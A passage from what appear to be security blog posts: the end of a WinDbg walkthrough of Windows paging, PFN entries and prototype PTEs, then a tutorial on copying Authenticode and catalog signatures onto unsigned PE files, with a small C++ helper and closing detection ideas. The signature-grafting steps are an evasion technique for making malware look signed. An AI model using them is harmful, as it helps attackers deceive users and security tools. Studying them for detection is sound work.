    Again, the output is quite verbose, so the section information at the bottom is omitted from the above snippet. We're interested in the address of entry point member of the optional header, which is listed as 0x3acc. That value is called a relative virtual address (RVA), and it's the number of bytes from the base address of the notepad.exe image. If we add that relative address to the base of notepad.exe, we should see the code located at our entry point.


    And we do see that the address resolves to notepad!WinMainCRTStartup, like we expected. Now we have the address of our target process' entry point: 00000000`ffd53acc.

    While the above steps were a handy exercise in digging through parts of a loaded image, they weren't actually necessary since we had symbols loaded. We could have simply used the ? qualifier in combination with the symbol notepad!WinMainCRTStartup, as demonstrated below, or gotten the value of a handy pseudo-register that represents the entry point with r $exentry.


    In any case, we now have the address of our entry point, which from here on we'll refer to as our “target” or the “target page”. We can now start taking a look at the different paging structures that support our target, as well as the PFN database entry for it.

    Let's first take a look at the PFN database. We know the virtual address where this structure is supposed to start, but let's look for it the long way, anyway. We can easily find the beginning of this structure by using the ? qualifier and poi on the symbol name. The poi operator treats its argument as a pointer and retrieves the value located at that address.


    Knowing that the PFN database begins at 0xfffffa80`00000000, we should be able to index easily to the entry that represents our target page. First we need to figure out the page frame number in physical memory that the target's PTE refers to, and then we can index into the PFN database by that number.

    Looking back on what we learned from the previous article, we can grab the PTE information about the target page very easily using the handy !pte command.


    The above result would indicate that the backing page frame number for the target is 0x65207b. That should be the index into the PFN database that we'll need to use. Remember that we'll need to multiply that index by the size of an nt!_MMPFN structure, since we're essentially trying to skip that many PFN entries.


    This looks like a valid PFN entry. We can verify that we've done everything correctly by first doing the manual calculation to figure out what the address of the PFN entry should be, and then comparing it to where WinDbg thinks it should be.


    So based on the above, we know that the nt!_MMPFN entry for the page we're interested in should be located at 0xfffffa80`12f61710, and we can use a nice shortcut to verify that we're correct. As always in WinDbg, there is an easier way to obtain information from the PFN database. This can be done by using the !pfn command with the page frame number.


    Here we can see that WinDbg also indicates that the PFN entry is at 0xfffffa8012f61710, just like our calculation, so it looks like we did that correctly.

    An interlude about working sets

    Phew - we've done some digging around in the PFN database now, and we've seen how each entry in that database stores some information about the physical page itself. Let's take a step back for a moment, back into the world of virtual memory, and talk about working sets.

    Each process has what's called a working set, which represents all of the process' virtual memory that is subject to paging and is accessible without incurring a page fault. Some parts of the process' memory may be paged to disk in order to free up RAM, or in a transition state, and therefore accessing those regions of memory will generate a page fault within that process. In layman's terms, a page fault is essentially the architecture indicating that it can't access the specified virtual memory, because the PTEs needed for translation weren't found inside the paging structures, or because the permissions on the PTEs restrict what the application is attempting to do. When a page fault occurs, the page fault handler must resolve it by adding the page back into the process' working set (meaning it also gets added back into the process' paging structures), mapping the page back into memory from disk and then adding it back to the working set, or indicating that the page being accessed is invalid.

    Figure 7: An example working set of a process, where some rarely accessed pages were paged out to disk to free up physical memory.

    It should be noted that other regions of virtual memory may be accessible to the process which do not appear in the working set, such as Address Windowing Extensions (AWE) mappings or large pages; however, for the purposes of this article we will be focusing on memory that is part of the working set.

    Occasionally, Windows will trim the working set of a process in response to (or to avoid) memory pressure on the system, ensuring there is memory available for other processes.

    If the working set of a process is trimmed, the pages being trimmed have their backing PTEs marked as “not valid” and are put into a transition state while they await being paged to disk or given away to another process. In the case of a “soft” page fault, the page described by the PTE is actually still resident in physical memory, and the page fault handler can simply mark the PTE as valid again and resolve the fault efficiently. Otherwise, in the case of a “hard” page fault, the page fault handler needs to fetch the contents of the page from the paging file on disk before marking the PTE as valid again. If this kind of fault occurs, the page fault handler will likely also have to alter the page frame number that the PTE refers to, since the page isn't likely to be loaded back into the same location in physical memory that it previously resided in.

    Sharing is caring

    It's important to remember that while two processes do have different paging structures that map their virtual memory to different parts of physical memory, there can be portions of their virtual memory which map to the same physical memory. This concept is called shared memory, and it's actually quite common within Windows. In fact, even in our previous example with notepad.exe's entry point, the page of memory we looked at was shared. Examples of regions in memory that are shared are system modules, shared libraries, and files that are mapped into memory with CreateFileMapping() and MapViewOfFile().

    In addition, the kernel-mode portion of a process' memory will also point to the same shared physical memory as other processes, because a shared view of the kernel is typically mapped into every process. Despite the fact that a view of the kernel is mapped into their memory, user-mode applications will not be able to access pages of kernel-mode memory, as Windows clears the User/Supervisor bit in the kernel-mode PTEs. The hardware uses this bit to restrict those pages to ring 0.

    Figure 8: Two processes may have different views of their user space virtual memory, but they get a shared view of the kernel space virtual memory.

    In the case of memory that is not shared between processes, the PFN database entry for that page of memory will point to the appropriate PTE in the process that owns that memory.

    Figure 9: When not sharing memory, each process will have its own PTE for a given page, and that PTE will point to a unique member of the PFN database.

    When dealing with memory that is shareable, Windows creates a kind of global PTE - known as a prototype PTE - for each page of the shared memory. This prototype always represents the real state of the physical memory for the shared page. If marked as Valid, this prototype PTE can act as a hardware PTE just as in any other case. If marked as Not Valid, the prototype will indicate to the page fault handler that the memory needs to be paged back in from disk. When a prototype PTE exists for a given page of memory, the PFN database entry for that page will always point to the prototype PTE.

    Figure 10: Even though both processes still have a valid PTE pointing to their shared memory, Windows has created a prototype PTE which points to the PFN entry, and the PFN entry now points to the prototype PTE instead of a specific process.

    Why would Windows create this special PTE for shared memory? Well, imagine for a moment that in one of the processes, the PTE that describes a shared memory location is stripped out of the process' working set. If the process then tries to access that memory, the page fault handler sees that the PTE has been marked as Not Valid, but it has no idea whether that shared page is still resident in physical memory or not.

    For this, it uses the prototype PTE. When the PTE for the shared page within the process is marked as Not Valid, the Prototype bit is also set and the page frame number is set to the location of the prototype PTE for that page.

    Figure 11: One of the processes no longer has a valid PTE for the shared memory, so Windows instead uses the prototype PTE to ascertain the true state of the physical page.

    This way, the page fault handler is able to examine the prototype PTE to see if the physical page is still valid and resident or not. If it is still resident, then the page fault handler can simply mark the process' version of the PTE as valid again, resolving the soft fault. If the prototype PTE indicates it is Not Valid, then the page fault handler must fetch the page from disk.

    We can continue our adventures in WinDbg to explore this further, as it can be a tricky concept. Based on what we know about shared memory, that should mean that the PTE referenced by the PFN entry for the entry point of notepad.exe is a prototype PTE. We can already see that it's a different address (0xfffff8a0`09e25a00) than the PTE that we were expecting from the !pte command (0xfffff680007fea98). Let's look at the fully expanded nt!_MMPTE structure that's being referenced in the PFN entry.


    We can compare that with the nt!_MMPTE entry that was referenced when we did the !pte command on notepad.exe's entry point.


    It looks like the Prototype bit is not set on either of them, and they're both valid. This makes perfect sense. The shared page still belongs to notepad.exe's working set, so the PTE in the process' paging structures is still valid; however, the operating system has proactively allocated a prototype PTE for it because the memory may be shared at some point and the state of the page will need to be tracked with the prototype PTE. The notepad.exe paging structures also point to a valid hardware PTE, just not the same one as the PFN database entry.

    The same isn't true for a region of memory that can't be shared. For example, if we choose another memory location that was allocated as MEM_PRIVATE, we will not see the same results. We can use the !vad command to give us all of the virtual address regions (listed by virtual page frame) that are mapped by the current process.


    We can take a look at a MEM_PRIVATE page, such as 0x1cf0, and see if the PTE from the process' paging structures matches the PTE from the PFN database.


    As we can see, it does match, with both addresses referring to 0xfffff680`0000e780. Because this memory is not shareable, the process' paging structures are able to manage the hardware PTE directly. In the case of shareable pages allocated with MEM_MAPPED, though, the PFN database maintains its own copy of the PTE.

    It's worth exploring different regions of memory this way, just to see how the paging structures and PFN entries are set up in different cases. As mentioned above, the VAD tree is another important consideration when dealing with user-mode memory as in many cases, it will actually be a VAD node which indicates where the prototype PTE for a given shared memory region resides. In these cases, the page fault handler will need to refer to the process' VAD tree and walk the tree until it finds the node responsible for the shared memory region.

    Figure 12: If the invalid PTE points to the process' VAD tree, a VAD walk must be performed to locate the appropriate _MMVAD node that represents the given virtual memory.

    The FirstPrototypePte member of the VAD node will indicate the starting virtual address of a region of memory that contains prototype PTEs for each shared page in the region. The list of prototype PTEs is terminated with the LastContiguousPte member of the VAD node. The page fault handler must then walk this list of prototype PTEs to find the PTE that backs the specific page that has faulted.

    Figure 13: The FirstPrototypePte member of the VAD node points to a region of memory that has a contiguous block of prototype PTEs that represent shared memory within that virtual address range.

    One more example to bring it all together

    It would be helpful to walk through each of these scenarios with a program that we control, and that we can change, if needed. That's precisely what we're going to do with the memdemo project. You can follow along by compiling the application yourself, or you can simply take a look at the code snippets that will be posted throughout this example.

    To start off, we'll load our memdemo.exe and then attach the kernel debugger. We then need to get a list of processes that are currently running on the system.


    Let's quickly switch back to the application so that we can let it create our initial buffer. To do this, we're simply allocating some memory and then accessing it to make sure it's resident.

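    The original snippet is not reproduced here, but the allocation step amounts to something like the following sketch (the actual memdemo code may differ slightly):

    #include <windows.h>
    #include <stdio.h>

    int main(void)
    {
        // Commit a page and touch it so that it's resident in our
        // working set before we inspect it with the kernel debugger.
        unsigned char *buffer = (unsigned char *)VirtualAlloc(
            NULL, 4096, MEM_RESERVE | MEM_COMMIT, PAGE_READWRITE);

        buffer[0] = 0xff; // the write also sets the Dirty bit on the PTE

        printf("buffer: %p\n", buffer);
        getchar(); // pause so we can break in with the debugger

        // ... the later steps of the demo continue from here ...
        return 0;
    }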

    Upon running the code, we see that the application has created a buffer for us (in the current example) at 0x000001fe`151c0000. Your buffer may differ.

    We should hop back into our debugger now and check out that memory address. As mentioned before, it's important to remember to switch back into the process context of memdemo.exe when we break back in with the debugger. We have no idea what context we could have been in when we interrupted execution, so it's important to always do this step.


    When we wrote memdemo.exe, we could have used the __debugbreak() compiler intrinsic to avoid having to constantly switch back to our process' context. It would ensure that when the breakpoint was hit, we were already in the correct context. For the purposes of this article, though, it's best to practice swapping back into the correct process context, as during most live analysis we would not have the liberty of throwing int3 exceptions during the program's execution.

    We can now check out the memory at 0x000001fe`151c0000 using the db command.


    Looks like that was a success - we can even see the 0xff byte that we wrote to it. Let's have a look at the backing PTE for this page using the !pte command.


    That's good news. It seems like the Valid (V) bit is set, which is what we expect. The memory is Writeable (W), as well, which makes sense based on our PAGE_READWRITE permissions. Let's look at the PFN database entry using !pfn for page 0xa1dd0.


    We can see that the PFN entry points to the same PTE structure we were just looking at. We can go to the address of the PTE at 0xffffed00ff0a8e00 and cast it as an nt!_MMPTE.


    We see that it's Valid, Dirty, Accessed, and Writeable, which are all things that we expect. The Accessed bit is set by the hardware when the page table entry is used for translation. If that bit is set, it means that at some point the memory has been accessed because the PTE was used as part of an address translation. Software can reset this value in order to track accesses to certain memory. Similarly, the Dirty bit shows that the memory has been written to, and is also set by the hardware. We see that it's set for us because we wrote our 0xff byte to the page.

    Now let's let the application execute using the g command. We're going to let the program page out the memory that we were just looking at, using the following code:

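    The exact memdemo code isn't shown here; one way to perform the trim, sketched below, abuses a documented quirk of VirtualUnlock (continuing with the buffer pointer from the earlier step):

    // Calling VirtualUnlock on memory that was never locked fails with
    // ERROR_NOT_LOCKED, but as documented it still removes the pages
    // from the working set - exactly the trim we want.
    VirtualUnlock(buffer, 4096);

    getchar(); // break back in and inspect the PTE again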

    Once that's complete, don't forget to switch back to the process context again. We need to do that every time we go back into the debugger! Now let's check out the PTE with the !pte command after the page has been supposedly trimmed from our working set.


    We see now that the PTE is no longer valid, because the page has been trimmed from our working set; however, it has not been paged out of RAM yet. This means it is in a transition state, as shown by WinDbg. We can verify this for ourselves by looking at the actual PTE structure again.


    In the _MMPTE_TRANSITION version of the structure, the Transition bit is set. So because the memory hasn't yet been paged out, if our program were to access that memory, it would cause a soft page fault that would then simply mark the PTE as valid again. If we examine the PFN entry with !pfn, we can see that the page is still resident in physical memory for now, and still points to our original PTE.


    Now let's press g again and let the app continue. It'll create a shared section of memory for us. In order to do so, we need to create a file mapping and then map a view of that file into our process.

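    A sketch of that step (again, the actual memdemo code may differ):

    // Create a pagefile-backed section and map a view of it into our
    // address space, then touch it so that the shared page is resident.
    HANDLE section = CreateFileMappingW(
        INVALID_HANDLE_VALUE, NULL, PAGE_READWRITE, 0, 4096, NULL);

    unsigned char *shared = (unsigned char *)MapViewOfFile(
        section, FILE_MAP_ALL_ACCESS, 0, 0, 4096);

    shared[0] = 0xff; // write our marker byte to the shared page

    printf("shared: %p\n", shared);
    getchar();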

    Let's take a look at the shared memory (at 0x000001fe`151d0000 in this example) using db. Don't forget to change back to our process context when you switch back into the debugger.


    And look! There's the 0xff that we wrote to this memory region as well. We're going to follow the same steps that we did with the previous allocation, but first let's take a quick look at our process' VAD tree with the !vad command.


    You can see the first allocation we did, starting at virtual page number 0x1fe151c0. It's a Private region that has the PAGE_READWRITE permissions applied to it. You can also see the shared section allocated at VPN 0x1fe151d0. It has the same permissions as the non-shared region; however, you can see that it's Mapped rather than Private.

    Let's take a look at the PTE information that's backing our shared memory.


    This region, too, is Valid and Writeable, just like we'd expect. Now let's take a look at the !pfn.


    We see that the Share Count now actually shows us how many times the page has been shared, and the page also has the Shared property. In addition, we see that the PTE address referenced by the PFN entry is not the same as the PTE that we got from the !pte command. That's because the PFN database entry is referencing a prototype PTE, while the PTE within our process is acting as a hardware PTE because the memory is still valid and mapped in.

    Let's take a look at the PTE structure that's in our process' paging structures, that was originally found with the !pte command.


    We can see that it's Valid, so it will be used by the hardware for address translation. Let's see what we find when we take a look at the prototype PTE being referenced by the PFN entry.


    This PTE is also valid, because it's representing the true state of the physical page. Something interesting to note, though, is that you can see that the Dirty bit is not set. Because this bit is only set by the hardware in the context of whatever process is doing the writing, you can theoretically use this bit to actually detect which process on a system wrote to a shared memory region.

    Now let's run the app more and let it page out the shared memory using the same technique we used with the private memory. Here's what the code looks like:

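    Sketched, it is simply the same VirtualUnlock trick applied to the mapped view:

    // Trim the shared view from our working set, just as before.
    VirtualUnlock(shared, 4096);

    getchar();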

    Let's take a look at the memory with db now.


    We see now that it's no longer visible in our process. Let's see what we get if we run !pte on it.


    The PTE that's backing our page is no longer valid. We still get an indication of what the page permissions were, but the PTE now tells us to refer to the process' VAD tree in order to get access to the prototype PTE that contains the real state. If you recall from when we used the !vad command earlier in our example, the address of the VAD node for our shared memory is 0xffffa50d`d2313a20. Let's take a look at that memory location as an nt!_MMVAD structure.


    The FirstPrototypePte member contains a pointer to a location in virtual memory that stores contiguous prototype PTEs for the region of memory represented by this VAD node. Since we only allocated (and subsequently paged out) one page, there's only one prototype PTE in this list. The LastContiguousPte member shows that our prototype PTE is both the first and last element in the list. Let's take a look at this prototype PTE as an nt!_MMPTE structure.


    We can see that the prototype indicates that the memory is no longer valid. So what can we do to force this page back into memory? We access it, of course. Let's let the app run one more step so that it can try to access this memory again.

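    A sketch of that step - the volatile qualifier forces a real read instead of letting the compiler optimize the access away:

    // Touch the shared page so the fault handler brings it back in.
    volatile unsigned char marker = shared[0];
    (void)marker;

    getchar();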

    Remember to switch back into the context of the process after the application has executed the next step, and then take a look at the PTE from the PFN entry again.


    Looks like it's back, just like we expected!

    Exhausted yet? Compared to the 64-bit paging scheme we talked about in our last article, Windows memory management is significantly more complex and involves a lot of moving parts. But at its core, it's not too daunting. Hopefully, now with a much stronger grasp of how things work under the hood, we can put our memory management knowledge to use in something practical in a future article.

    If you're interested in getting your hands on the code used in this article, you can check it out on GitHub and experiment on your own with it.


    Further reading and attributions

    Consider picking up a copy of "Windows Internals, 7th Edition" or "What Makes It Page?" to get an even deeper dive on the Windows virtual memory manager. 

    Thank you to Alex Ionescu for additional tips and clarification. Thanks to irqlnotdispatchlevel for pointing out an address miscalculation.

    Application of Authenticode Signatures to Unsigned Code

    28 August 2017 at 12:31
    Attackers have been known to apply legitimate digital certificates to their malware, presumably, to evade basic signature validation utilities. This was the case with the Petya ransomware. As a reverse engineer or red team capability developer, it is important to know the methods in which legitimate signatures can be applied to otherwise unsigned, attacker-supplied code. This blog post will give some background on code signing mechanisms, digital signature binary formats, and finally, techniques describing the application of digital certificates to an unsigned PE file. Soon, you will also see why these techniques are even more relevant in research that I will be releasing next month.

    Background


    What does it mean for a PE file (exe, dll, sys, etc.) to be signed? For many, the simple answer is to open the file properties on a PE and, if a “Digital Signatures” tab is present, conclude that it was signed. When you see that the “Digital Signatures” tab is present on a file, it actually means that the PE file was Authenticode signed: within the file itself there is a binary blob of data consisting of a certificate and a signed hash of the file (more specifically, the Authenticode hash, which doesn’t consider certain parts of the PE header in the hash calculation). The format in which an Authenticode signature is stored is documented in the PE Authenticode specification.


    Many files that one would expect to be signed, however (for example, notepad.exe), do not have a “Digital Signatures” tab. Does this mean that the file isn’t signed and that Microsoft is actually shipping unsigned code? Well, it depends. While notepad.exe does not have an Authenticode signature embedded within itself, in reality, it was signed via another means - catalog signing. Windows contains a catalog store consisting of many catalog files that are basically just lists of Authenticode hashes. Each catalog file is then signed to attest that any files with matching hashes originated from the signer of the catalog file (which is Microsoft in almost all cases). So while the Explorer UI does not attempt to look up catalog signatures, pretty much any other signature verification tool will perform catalog lookups - e.g. Get-AuthenticodeSignature in PowerShell and Sysinternals Sigcheck.

    Note: The catalog file store is located in %windir%\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}



    In the above screenshot, the SignatureType property indicates that notepad.exe is catalog signed. What is also worth noting is the IsOSBinary property. While the implementation is not documented, this will show “True” if a signature chains to one of several known, hashed Microsoft root certificates. Those interested in learning more about how this works should reverse the CertVerifyCertificateChainPolicy function.

    Sigcheck with the “-i” switch will perform catalog certificate validation and also display the catalog file path that contains the matching Authenticode hash. The “-h” switch will also calculate and display the SHA1 and SHA256 Authenticode hashes of the PE file (PESHA1 and PE256, respectively):

    sigcheck -q -h -i C:\Windows\System32\notepad.exe

    c:\windows\system32\notepad.exe:

      Verified:       Signed

      Catalog:        C:\WINDOWS\system32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package-AutoMerged-shell~31bf3856ad364e35~amd64~~10.0.15063.0.cat

      Signers:

        Microsoft Windows

          Status:         Valid

          Valid Usage:    NT5 Crypto, Code Signing

          Serial Number:  33 00 00 01 06 6E C3 25 C4 31 C9 18 0E 00 00 00 00 01 06

          Thumbprint:     AFDD80C4EBF2F61D3943F18BB566D6AA6F6E5033

          Algorithm:      1.2.840.113549.1.1.11

          Valid from:     1:39 PM 10/11/2016

          Valid to:       1:39 PM 1/11/2018

        Microsoft Windows Production PCA 2011

          Status:         Valid

          Valid Usage:    All

          Serial Number:  61 07 76 56 00 00 00 00 00 08

          Thumbprint:     580A6F4CC4E4B669B9EBDC1B2B3E087B80D0678D

          Algorithm:      1.2.840.113549.1.1.11

          Valid from:     11:41 AM 10/19/2011

          Valid to:       11:51 AM 10/19/2026

        Microsoft Root Certificate Authority 2010

          Status:         Valid

          Valid Usage:    All

          Serial Number:  28 CC 3A 25 BF BA 44 AC 44 9A 9B 58 6B 43 39 AA

          Thumbprint:     3B1EFD3A66EA28B16697394703A72CA340A05BD5

          Algorithm:      1.2.840.113549.1.1.11

          Valid from:     2:57 PM 6/23/2010

          Valid to:       3:04 PM 6/23/2035

        Signing date:   1:02 PM 3/18/2017

        Counter Signers:

          Microsoft Time-Stamp Service

            Status:         Valid

            Valid Usage:    Timestamp Signing

            Serial Number:  33 00 00 00 B3 39 BB D4 12 93 15 A9 FE 00 00 00 00 00 B3

            Thumbprint:     BEF9C1F4DA0F153FF0900303BE78A59ADA8ADCB9

            Algorithm:      1.2.840.113549.1.1.11

            Valid from:     10:56 AM 9/7/2016

            Valid to:       10:56 AM 9/7/2018

          Microsoft Time-Stamp PCA 2010

            Status:         Valid

            Valid Usage:    All

            Serial Number:  61 09 81 2A 00 00 00 00 00 02

            Thumbprint:     2AA752FE64C49ABE82913C463529CF10FF2F04EE

            Algorithm:      1.2.840.113549.1.1.11

            Valid from:     2:36 PM 7/1/2010

            Valid to:       2:46 PM 7/1/2025

          Microsoft Root Certificate Authority 2010

            Status:         Valid

            Valid Usage:    All

            Serial Number:  28 CC 3A 25 BF BA 44 AC 44 9A 9B 58 6B 43 39 AA

            Thumbprint:     3B1EFD3A66EA28B16697394703A72CA340A05BD5

            Algorithm:      1.2.840.113549.1.1.11

            Valid from:     2:57 PM 6/23/2010

            Valid to:       3:04 PM 6/23/2035

        Publisher:      Microsoft Windows

        Description:    Notepad

        Product:        Microsoft® Windows® Operating System

        Prod version:   10.0.15063.0

        File version:   10.0.15063.0 (WinBuild.160101.0800)

        MachineType:    64-bit

        MD5:    F60A9D3A9461F68DE0FCCEBB0C6CB31A

        SHA1:   2302BA58181F3C4E1E44A47A7D214EE9397CF2BA

        PESHA1: ACCE8ADCE9DDDE507EAE295DBB37683CA272DB9E

        PE256:  0C67E3923EDA8154A89ADCA8A6BF47DF7C07D40BB41963DEB16ACBCF2E54803E

        SHA256: C84C361B7F5DBAEAC93828E60D2B54704D3E7CA84148BAFDA632F9AD6CDC96FA

        IMP:    645E8D8B0AEA808FF16DAA70D6EE720E


    Knowing the Authenticode hash allows you to look up the respective entry in the catalog file. You can double-click a catalog file to view its entries. I also wrote the CatalogTools PowerShell module to parse catalog files. The “hint” metadata field gives away that notepad.exe is indeed the corresponding entry:


    Digital Signature Binary Format


    Now that you have an understanding of the methods in which a PE file can be signed (Authenticode and catalog), it is useful to have some background on the binary format of signatures. Whether Authenticode signed or catalog signed, both signatures are stored as PKCS #7 signed data which is ASN.1 formatted binary data. ASN.1 is simply a standard that states how binary data of different data types should be stored. Before observing/parsing the bytes of a digital signature, you must first know how it is stored in the file. Catalog files are straightforward as the file itself consists of raw PKCS #7 data. There are online ASN.1 decoders that parse out ASN.1 data and present it in an intuitive fashion. For example, try loading the catalog file containing the hash for notepad.exe into the decoder and you will get a sense of the layout of the data. Here’s a snippet of the parsed output:


    Each property within the ASN.1 encoded data begins with an object identifier (OID) - a unique numeric sequence that identifies the type of data that follows. The OIDs worth noting in the above snippet are the following:
    1. 1.2.840.113549.1.7.2 - This indicates that what follows is PKCS #7 signed data - the format expected for Authenticode and catalog-signed code.
    2. 1.3.6.1.4.1.311.12.1.1 - This indicates that what follows is catalog file hash data.
    It is worth spending time exploring all of the fields contained within a digital signature. All fields present are outside of the scope of this blog post, however. Additional crypto/signature-related OIDs are listed here.

    Embedded PE Authenticode Signature Retrieval


    The digital signature data in a PE file with an embedded Authenticode signature is appended to the end of the file (in a well-formatted PE file). The OS obviously needs a little bit more information than that though in order to retrieve the exact offset and size of the embedded signature. Let’s look at kernel32.dll in one of my favorite PE parsing/editing utilities: CFF Explorer.


    The offset and size of the embedded digital signature are stored in the “security directory” entry within the “data directories” array within the optional header. The data directory contains the offsets and sizes of various structures within the PE file - exports, imports, relocations, etc. All offsets within the data directory are relative virtual addresses (RVAs), meaning they are offsets to the respective portions of the PE when loaded in memory. There is one exception though - the security directory, which stores its offset as a file offset. The reason for this is that the Windows loader doesn’t actually load the content of the security directory in memory.

    The binary data at the security directory file offset is a WIN_CERTIFICATE structure. Here’s what the structure for kernel32.dll looks like parsed out in 010 Editor (file offset 0x000A9600):

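    For reference, the WIN_CERTIFICATE structure is declared in wintrust.h as follows:

    typedef struct _WIN_CERTIFICATE {
        DWORD dwLength;          // total length, header fields included
        WORD  wRevision;         // e.g. WIN_CERT_REVISION_2_0 (0x0200)
        WORD  wCertificateType;  // e.g. WIN_CERT_TYPE_PKCS_SIGNED_DATA (0x0002)
        BYTE  bCertificate[ANYSIZE_ARRAY]; // the PKCS #7 signed data blob
    } WIN_CERTIFICATE, *LPWIN_CERTIFICATE;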

    PE Authenticode signatures should always have a wCertificateType of WIN_CERT_TYPE_PKCS_SIGNED_DATA. The byte array that follows is the same PKCS #7, ASN.1 encoded signed data as was seen in the contents of a catalog file. The only difference is that you shouldn’t find the 1.3.6.1.4.1.311.12.1.1 OID, indicating the presence of catalog hashes.
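
    Locating this structure programmatically in a raw (un-mapped) PE file is straightforward. The sketch below omits all header validation for brevity; note that, unlike every other directory, no RVA-to-file-offset translation is needed:

    #include <windows.h>
    #include <wintrust.h>

    WIN_CERTIFICATE *GetEmbeddedSignature(unsigned char *fileBuffer)
    {
        IMAGE_DOS_HEADER *dosHeader = (IMAGE_DOS_HEADER *)fileBuffer;
        IMAGE_NT_HEADERS *ntHeaders =
            (IMAGE_NT_HEADERS *)(fileBuffer + dosHeader->e_lfanew);
        IMAGE_DATA_DIRECTORY *securityDir =
            &ntHeaders->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_SECURITY];

        if (securityDir->VirtualAddress == 0 || securityDir->Size == 0)
            return NULL; // no embedded Authenticode signature

        // For the security directory only, VirtualAddress is a file offset.
        return (WIN_CERTIFICATE *)(fileBuffer + securityDir->VirtualAddress);
    }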

    Parsing out the raw bCertificate data in the online ASN.1 decoder confirms we’re dealing with proper PKCS #7 data:

    Application of Digital Signatures to Unsigned PEs


    Now that you have a basic idea of the binary format and storage locations of digital signatures, you can start applying existing signatures to your unsigned code.

    Application of Embedded Authenticode Signatures


    Applying an embedded Authenticode signature from a signed file to an unsigned PE file is quite straightforward. While the process can obviously be automated, I’m going to explain how to do it manually with a hex editor and CFF Explorer.

    Step #1: Identify the Authenticode signature that you want to steal. In this example, I will use the one in kernel32.dll

    Step #2: Identify the offset and size of the WIN_CERTIFICATE structure in the “security directory”


    So the file offset in the above screenshot is 0x000A9600 and the size is 0x00003A68.

    Step #3: Open kernel32.dll in a hex editor, select 0x3A68 bytes starting at offset 0xA9600, and then copy the bytes.


    Step #4: Open your unsigned PE (HelloWorld.exe in this example) in a hex editor, scroll to the end, and paste the bytes copied from kernel32.dll. Take note of the file offset of the beginning of the signature (0x00000E00 in my case). Save the file after pasting in the signature.


    Step #5: Open HelloWorld.exe in CFF Explorer and update the security directory to point to the digital signature that was applied: offset - 0x00000E00, size - 0x00003A68. Save the file after making the modifications. Ignore the “Invalid” warning. CFF Explorer doesn’t treat the security directory as a file offset and gets confused when it tries to reference what section the data resides in.


    That’s it! Now, signature validation utilities will parse and display the signature properly. The only caveat is that they will report that the signature is invalid because the calculated Authenticode of the file does not match that of the signed hash stored in the certificate.

    Now, if you were wondering why the SignerCertificate thumbprint values don’t match, then you are an astute reader. Considering we applied the identical signature, why doesn’t the certificate thumbprint match? That’s because Get-AuthenticodeSignature first attempts a catalog file lookup of kernel32.dll. In this case, it found a catalog entry for kernel32.dll and is displaying the signature information for the signer of the catalog file. kernel32.dll is also Authenticode signed though. To validate that the thumbprint values for the Authenticode hashes are identical, temporarily stop the CryptSvc service - the service responsible for performing catalog hash lookups. Now you will see that the thumbprint values match. This indicates that the catalog hash was signed with a different code signing certificate from the certificate used to sign kernel32.dll itself.

    Application of a Catalog Signature to a PE File


    Realistically, CryptSvc will always be running and catalog lookups will be performed. Suppose you want to be mindful of OPSEC and match the identical certificate used to sign your target binary. It turns out that you can apply the contents of a catalog file to an embedded PE signature by swapping out the contents of bCertificate in the WIN_CERTIFICATE structure and updating dwLength accordingly. Feel free to follow along as this is done. Note that our goal here is to apply an Authenticode signature to our unsigned binary that is identical to the one used to sign the containing catalog file - certificate thumbprint AFDD80C4EBF2F61D3943F18BB566D6AA6F6E5033 in this case.

    Step #1: Identify the catalog file containing the Authenticode hash of the target binary - kernel32.dll in this case. If a file is Authenticode signed, sigcheck will actually fail to resolve the catalog file. Signtool (included in the Windows SDK) will, however.


    Step #2: Open the catalog file in a hex editor and note the file size - 0x000137C7


    Step #3: We’re going to manually craft a WIN_CERTIFICATE structure in a hex editor. Let’s go through each field we’ll supply (a short sketch that automates this follows the list):
    1. dwLength: This is the total length of the WIN_CERTIFICATE structure - i.e. bCertificate bytes plus the size of the other fields = 4 (size of DWORD) + 2 (size of WORD) + 2 (size of WORD) + 0x000137C7 (bCertificate - the file size of the .cat file) = 0x000137CF.
    2. wRevision: This will be 0x0200 to indicate WIN_CERT_REVISION_2_0.
    3. wCertificateType: This will be 0x0002 to indicate WIN_CERT_TYPE_PKCS_SIGNED_DATA.
    4. bCertificate: This will consist of the raw bytes of the catalog file.
    When crafting the bytes in the hex editor, be mindful that the fields are stored in little-endian format.
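
    Here is a small C++ sketch (my own) that performs the dwLength math and emits the crafted WIN_CERTIFICATE blob to a file, ready to be appended to the target PE in step #4:

    // cat2cert.cpp - wrap a catalog file in a WIN_CERTIFICATE header.
    #include <windows.h>
    #include <wintrust.h>   // WIN_CERT_REVISION_2_0, WIN_CERT_TYPE_PKCS_SIGNED_DATA
    #include <cstdio>
    #include <fstream>
    #include <iterator>
    #include <vector>

    int main(int argc, char** argv) {
        if (argc != 3) { printf("usage: %s <catalog.cat> <out.bin>\n", argv[0]); return 1; }
        std::ifstream f(argv[1], std::ios::binary);
        std::vector<char> cat((std::istreambuf_iterator<char>(f)),
                              std::istreambuf_iterator<char>());

        // dwLength = header fields (4 + 2 + 2) plus the catalog file's size.
        DWORD dwLength = (DWORD)(sizeof(DWORD) + sizeof(WORD) + sizeof(WORD) + cat.size());
        WORD  wRevision = WIN_CERT_REVISION_2_0;                 // 0x0200
        WORD  wCertificateType = WIN_CERT_TYPE_PKCS_SIGNED_DATA; // 0x0002

        // x86/x64 are little-endian, so writing the fields directly produces
        // the same byte order you would otherwise craft by hand in a hex editor.
        std::ofstream out(argv[2], std::ios::binary);
        out.write((char*)&dwLength, sizeof(dwLength));
        out.write((char*)&wRevision, sizeof(wRevision));
        out.write((char*)&wCertificateType, sizeof(wCertificateType));
        out.write(cat.data(), cat.size());   // bCertificate: the raw .cat bytes
        return 0;
    }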


    Step #4: Copy all the bytes from the crafted WIN_CERTIFICATE, append them to your unsigned PE, and update the security directory offset and size accordingly.


    Now, assuming your calculations and alignments were proper, behold a thumbprint match with that of the catalog file!


    Anomaly Detection Ideas


    The techniques presented in this blog post have hopefully gotten some people thinking about how one might go about detecting the abuse of digital signatures. While I have not investigated signature heuristics thoroughly, let me pose a series of questions that might motivate others to start investigating and writing detections for potential signature anomalies:
    • For a legitimately signed Microsoft PE, is there any correlation between the PE timestamp and the certificate validity period? Would the PE timestamp for attacker-supplied code deviate from the aforementioned correlation?
    • After reading this article, what is your level of trust in a “signed” file that has a hash mismatch?
    • How would you go about detecting a PE file that has an embedded Authenticode signature consisting of a catalog file? Hint: A specific OID mentioned earlier might be useful.
    • How might you go about validating the signature of a catalog-signed file on a different system?
